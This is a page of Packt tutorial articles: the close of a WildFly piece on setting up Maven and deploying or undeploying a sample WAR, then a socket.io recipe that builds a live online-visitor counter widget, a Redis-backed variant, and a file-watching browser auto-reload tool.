[root@wfly_book maven]# cd apache-maven-3.2.1/

Run the mvn command and, if an error is returned, we must set the M3_HOME environment variable, as described next:

[root@wfly_book ~]# mvn
-bash: mvn: command not found

If the previous error occurs, it is because the Maven binary was not found by the operating system, so we must create and configure the environment variable responsible for this. There are two settings: populate an environment variable with the Maven installation directory, and add the directory containing the necessary binaries to the PATH environment variable. Access and edit the /etc/profile file, taking advantage of the configuration that we did earlier with the Java environment variable; see how it looks with the Maven configuration as well:

#Java and Maven configuration
export JAVA_HOME="/usr/java/jdk1.7.0_45"
export M3_HOME="/opt/maven/apache-maven-3.2.1"
export PATH="$PATH:$JAVA_HOME/bin:$M3_HOME/bin"

Save and close the file, and then run the following command to apply the settings:

[root@wfly_book ~]# source /etc/profile

To verify the configuration, run the following command:

[root@wfly_book ~]# mvn -version

Now that we have the necessary tools to check out the application, let's begin. First, set up a directory where the application's source code will be saved, as shown in the following commands:

[root@wfly_book opt]# mkdir book_apps
[root@wfly_book opt]# cd book_apps/

Let's check out the project using the git clone command; the repository is available at https://github.com/spolti/wfly_book.git. Perform the checkout using the following command:

[root@wfly_book book_apps]# git clone https://github.com/spolti/wfly_book.git

Access the newly created directory using the following command:

[root@wfly_book book_apps]# cd wfly_book/

For the first example, we will use the application called app1-v01, so access this directory and build and deploy the project by issuing the following commands. Make sure that the WildFly server is already running. The first build is always very time-consuming, because Maven will download all the libraries needed to compile the project, the project dependencies, and the Maven libraries.

[root@wfly_book wfly_book]# cd app1-v01/
[root@wfly_book app1-v01]# mvn wildfly:deploy

For more details about the WildFly Maven plugin, take a look at https://docs.jboss.org/wildfly/plugins/maven/latest/index.html. The artifact will be generated and automatically deployed on the WildFly server.
Note that a message similar to the following is displayed, stating that the application was successfully deployed:

INFO [org.jboss.as.server] (ServerService Thread Pool -- 29) JBAS018559: Deployed "app1-v01.war" (runtime-name : "app1-v01.war")

When we deploy an artifact, and if we have not configured a virtual host or context root address, we access the application using the application name without the file suffix. The structure of the address is http://<your-ip-address>:<port-number>/app1-v01/. In my case, it would be http://192.168.11.109:8080/app1-v01/. This application is very simple; it is made using JSP and reads some system properties.

Note that in the deployments directory we have a marker file that indicates that the application was successfully deployed, as follows:

[root@wfly_book deployments]# ls -l
total 20
-rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war
-rw-r--r--. 1 wildfly wildfly   12 Jan 21 07:33 app1-v01.war.deployed
-rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt

To undeploy the application without removing the artifact, we need only remove the app1-v01.war.deployed file. This is done using the following commands:

[root@wfly_book ~]# cd $JBOSS_HOME/standalone/deployments
[root@wfly_book deployments]# rm app1-v01.war.deployed
rm: remove regular file `app1-v01.war.deployed'? y

In the previous step, you will also need to press Y to confirm removal of the file. You can also use the WildFly Maven plugin for undeployment, with the following command:

[root@wfly_book deployments]# mvn wildfly:undeploy

Notice that the log reports that the application was undeployed, and also note that a new marker, .undeployed, has been added, indicating that the artifact is no longer active in the runtime server:

INFO [org.jboss.as.server] (DeploymentScanner-threads - 1) JBAS018558: Undeployed "app1-v01.war" (runtime-name: "app1-v01.war")

Run the following command:

[root@wfly_book deployments]# ls -l
total 20
-rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war
-rw-r--r--. 1 wildfly wildfly   12 Jan 21 09:44 app1-v01.war.undeployed
-rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt

If you undeploy using the WildFly Maven plugin, the artifact itself is deleted from the deployments directory.

Summary

In this article, we learned how to configure an application using a virtual host and the context root, and also how to use the logging tools now available, putting Java to use in some of our test applications, among several other interesting settings.

Resources for Article:
Further resources on this subject:
JBoss AS Perspective [Article]
JBoss EAP6 Overview [Article]
JBoss RichFaces 3.3 Supplemental Installation [Article]

Creating a real-time widget

Packt
22 Apr 2014
11 min read
(For more resources related to this topic, see here.)

The configuration options and well-thought-out methods of socket.io make for a highly versatile library. Let's explore the dexterity of socket.io by creating a real-time widget that can be placed on any website and instantly interfaced with a remote Socket.IO server, providing a constantly updated total of all users currently on the site. We'll name it the live online counter (loc for short). Our widget is for public consumption and should require only basic knowledge, so we want a very simple interface. Loading our widget through a script tag and then initializing it with a prefabricated init method would be ideal (this allows us to predefine properties before initialization if necessary).

Getting ready

We'll need to create a new folder with some new files: widget_server.js, widget_client.js, server.js, and index.html.

How to do it...

Let's create the index.html file to define the kind of interface we want, as follows:

<html>
<head>
  <style>
    #_loc {color:blue;} /* widget customization */
  </style>
</head>
<body>
  <h1> My Web Page </h1>
  <script src="http://localhost:8081"></script>
  <script>
    locWidget.init();
  </script>
</body>
</html>

The localhost:8081 domain is where we'll be serving a concatenated script of both the client-side socket.io code and our own widget code. By default, Socket.IO hosts its client-side library over HTTP while simultaneously providing a WebSocket server at the same address, in this case localhost:8081. See the There's more… section for tips on how to configure this behavior.

Let's create our widget code, saving it as widget_client.js:

;(function() {
  window.locWidget = {
    style: 'position:absolute;bottom:0;right:0;font-size:3em',
    init: function() {
      var socket = io.connect('http://localhost:8081'),
          style = this.style;
      socket.on('connect', function() {
        var head = document.head,
            body = document.body,
            loc = document.getElementById('_lo_count');
        if (!loc) {
          head.innerHTML += '<style>#_loc{' + style + '}</style>';
          loc = document.createElement('div');
          loc.id = '_loc';
          loc.innerHTML = '<span id=_lo_count></span>';
          body.appendChild(loc);
        }
        socket.on('total', function(total) {
          loc.innerHTML = total;
        });
      });
    }
  };
}());

We need to test our widget from multiple domains.
We'll implement a quick HTTP server (server.js) to serve index.html so we can access it via both http://127.0.0.1:8080 and http://localhost:8080, as shown in the following code:

var http = require('http');
var fs = require('fs');
var clientHtml = fs.readFileSync('index.html');

http.createServer(function (request, response) {
  response.writeHead(200, {'Content-type': 'text/html'});
  response.end(clientHtml);
}).listen(8080);

Finally, for the server side of our widget, we write the following code in the widget_server.js file:

var io = require('socket.io')(),
    totals = {},
    clientScript = Buffer.concat([
      require('socket.io/node_modules/socket.io-client').source,
      require('fs').readFileSync('widget_client.js')
    ]);

io.static(false);
io.attach(require('http').createServer(function(req, res) {
  res.setHeader('Content-Type', 'text/javascript; charset=utf-8');
  // serve the concatenated socket.io client plus widget code
  res.end(clientScript);
}).listen(8081));

io.on('connection', function (socket) {
  var origin = socket.request.socket.domain || 'local';
  totals[origin] = totals[origin] || 0;
  totals[origin] += 1;
  socket.join(origin);
  io.sockets.to(origin).emit('total', totals[origin]);
  socket.on('disconnect', function () {
    totals[origin] -= 1;
    io.sockets.to(origin).emit('total', totals[origin]);
  });
});

To test it, we need two terminals; in the first one, we execute the following command:

node widget_server.js

In the other terminal, we execute the following command:

node server.js

We point our browser to http://localhost:8080, then open a new tab or window and navigate to http://localhost:8080 again; we will see the counter rise by one. If we close either window, it will drop by one. We can also navigate to http://127.0.0.1:8080 to emulate a separate origin; the counter at this address is independent of the counter at http://localhost:8080.

How it works...

The widget_server.js file is the powerhouse of this recipe. We start by using require with socket.io and calling it (note the empty parentheses following require); this becomes our io instance. Below this is our totals object; we'll use it later to store the total number of connected clients for each domain.

Next, we create our clientScript variable, which contains both the socket.io client code and our widget_client.js code. We'll serve this in response to all HTTP requests. Both scripts are stored as buffers, not strings. We could simply concatenate them with the plus (+) operator; however, this would force a string conversion first, so we use Buffer.concat instead. Anything that is passed to res.write or res.end is converted to a Buffer before being sent across the wire. Using the Buffer.concat method means our data stays in buffer format the whole way through, instead of going from buffer to string and back to buffer again.

When we require socket.io at the top of widget_server.js, we call it to create an io instance. Usually, at this point, we would pass in an HTTP server instance or a port number, and optionally an options object. To keep our top variables tidy, however, we use some configuration methods available on the io instance after all our requires. The io.static(false) call prevents socket.io from serving its own client-side code (because we're providing our own concatenated script file that contains both the socket.io client-side code and our widget code). Then we use the io.attach call to hook up our socket.io server with an HTTP server.
All requests that use the http:// protocol will be handled by the server we pass to io.attach, and all ws:// protocols will be handled by socket.io (whether or not the browser supports the ws:// protocol).

Now the stage is set for the actual socket action. We wait for a connection by listening for the connection event on io.sockets. Inside the event handler, we use a few as-yet-undiscussed socket.io qualities. A WebSocket is formed when a client initiates a handshake request over HTTP and the server responds affirmatively. We can access the original request object with socket.request. The request object itself has a socket (this is the underlying HTTP socket, not our socket.io socket), which we can access via socket.request.socket. That socket contains the domain a client request came from. We load socket.request.socket.domain into our origin variable unless it's null or undefined, in which case we say the origin is 'local'. We extract (and simplify) the origin because it allows us to distinguish between websites that use the widget, enabling site-specific counts.

To keep count, we use our totals object, adding a property for every new origin with an initial value of 0. On each connection, we add 1 to totals[origin]; in the socket's disconnect event, we subtract 1 from totals[origin]. If these values were exclusively for server use, our solution would be complete. However, we need a way to communicate the totals to the clients, on a site-by-site basis. Socket.IO has had a handy feature since version 0.7 that allows us to group sockets into rooms by using the socket.join method. We make each socket join a room named after its origin, and then use the io.sockets.to(origin).emit method to instruct socket.io to emit only to sockets belonging to the originating site's room. In both the io.sockets connection event and the socket disconnect event, we emit the specific totals to the corresponding sockets, updating each client with the total number of connections to the site the user is on.

The widget_client.js file simply creates a div element called #_loc and updates it with any new totals it receives from widget_server.js.

There's more...

Let's look at how our app could be made more scalable, as well as at another use for WebSockets.

Preparing for scalability

If we were to serve thousands of websites, we would need scalable memory storage, and Redis would be a perfect fit. It operates in memory but also allows us to scale across multiple servers. We'll need Redis installed, along with the redis module. We'll alter our totals variable so it contains a Redis client instead of a JavaScript object:

var io = require('socket.io')(),
    totals = require('redis').createClient(),
    //other variables

Now, we modify our connection event handler as shown in the following code:

io.sockets.on('connection', function (socket) {
  var origin = (socket.handshake.xdomain)
    ? url.parse(socket.handshake.headers.origin).hostname
    : 'local';
  socket.join(origin);
  totals.incr(origin, function (err, total) {
    io.sockets.to(origin).emit('total', total);
  });
  socket.on('disconnect', function () {
    totals.decr(origin, function (err, total) {
      io.sockets.to(origin).emit('total', total);
    });
  });
});

Instead of adding 1 to totals[origin], we use the Redis INCR command to increment a Redis key named after origin. Redis automatically creates the key if it doesn't exist. When a client disconnects, we do the reverse and readjust the totals using DECR.
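If we also needed to scale the WebSocket layer itself across multiple Node processes, Socket.IO can share its rooms and broadcasts through Redis as well. The following is only a sketch; the socket.io-redis adapter package and its options are assumptions, not something covered in the original recipe:

// a sketch of multi-process scaling, assuming the socket.io-redis adapter
var io = require('socket.io')(8081);
var redisAdapter = require('socket.io-redis');

// every process that attaches this adapter shares rooms and emits
// through Redis pub/sub, so totals reach clients on any process
io.adapter(redisAdapter({ host: '127.0.0.1', port: 6379 }));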
WebSockets as a development tool

When developing a website, we often change something small in our editor, upload our file (if necessary), refresh the browser, and wait to see the results. What if the browser would refresh automatically whenever we saved any file relevant to our site? We can achieve this with the fs.watch method and WebSockets. The fs.watch method monitors a directory, executing a callback whenever a change to any file in the folder occurs (it doesn't monitor subfolders, though).

The fs.watch method is dependent on the operating system. To date, fs.watch has also been historically buggy (mostly under Mac OS X). Therefore, until further advancements, fs.watch is suited purely to development environments rather than production (you can monitor how fs.watch is doing by viewing the open and closed issues at https://github.com/joyent/node/search?q=fs.watch&ref=cmdform&state=open&type=Issues).

Our development tool could be used alongside any framework, from PHP to static files. For the server counterpart of our tool, we'll configure watcher.js:

var io = require('socket.io')(),
    fs = require('fs'),
    watcher = function () {
      var socket = io.connect('ws://localhost:8081');
      socket.on('update', function () {
        location.reload();
      });
    },
    clientScript = Buffer.concat([
      require('socket.io/node_modules/socket.io-client').source,
      Buffer(';(' + watcher + '());')
    ]);

io.static(false);
io.attach(require('http').createServer(function(req, res) {
  res.setHeader('Content-Type', 'text/javascript; charset=utf-8');
  res.end(clientScript);
}).listen(8081));

fs.watch('content', function (e, f) {
  if (f[0] !== '.') {
    io.sockets.emit('update');
  }
});

Most of this code is familiar. We make a socket.io server (on a different port to avoid clashing), generate a concatenated socket.io.js plus client-side watcher code file, and deliver it via our attached server. Since this is a quick tool for our own development use, our client-side code is written as a normal JavaScript function (our watcher variable), converted to a string while wrapping it in self-calling function code, and then changed to a Buffer so it's compatible with Buffer.concat.

The last piece of code calls the fs.watch method, where the callback receives the event name (e) and the filename (f). We check that the filename isn't a hidden dotfile, because during a save event some filesystems or editors will change hidden files in the directory, triggering multiple callbacks and sending several messages at high speed, which can cause issues for the browser.

To use the tool, we simply place it as a script within every page that is served (probably using server-side templating). However, for demonstration purposes, we simply place the following code into content/index.html:

<script src="http://localhost:8081/socket.io/watcher.js"></script>

Once we fire up server.js and watcher.js, we can point our browser to http://localhost:8080 and see the familiar excited Yay!. Any changes we make and save (either to index.html, styles.css, or script.js, or the addition of new files) will be almost instantly reflected in the browser. The first change we can make is to get rid of the alert box in the script.js file so that the changes can be seen fluidly.

Summary

We saw how we could create a real-time widget in this article.
We also used some third-party modules to explore some of the potential of the powerful combination of Node and WebSockets.

Resources for Article:
Further resources on this subject:
Understanding and Developing Node Modules [Article]
So, what is Node.js? [Article]
Setting up Node [Article]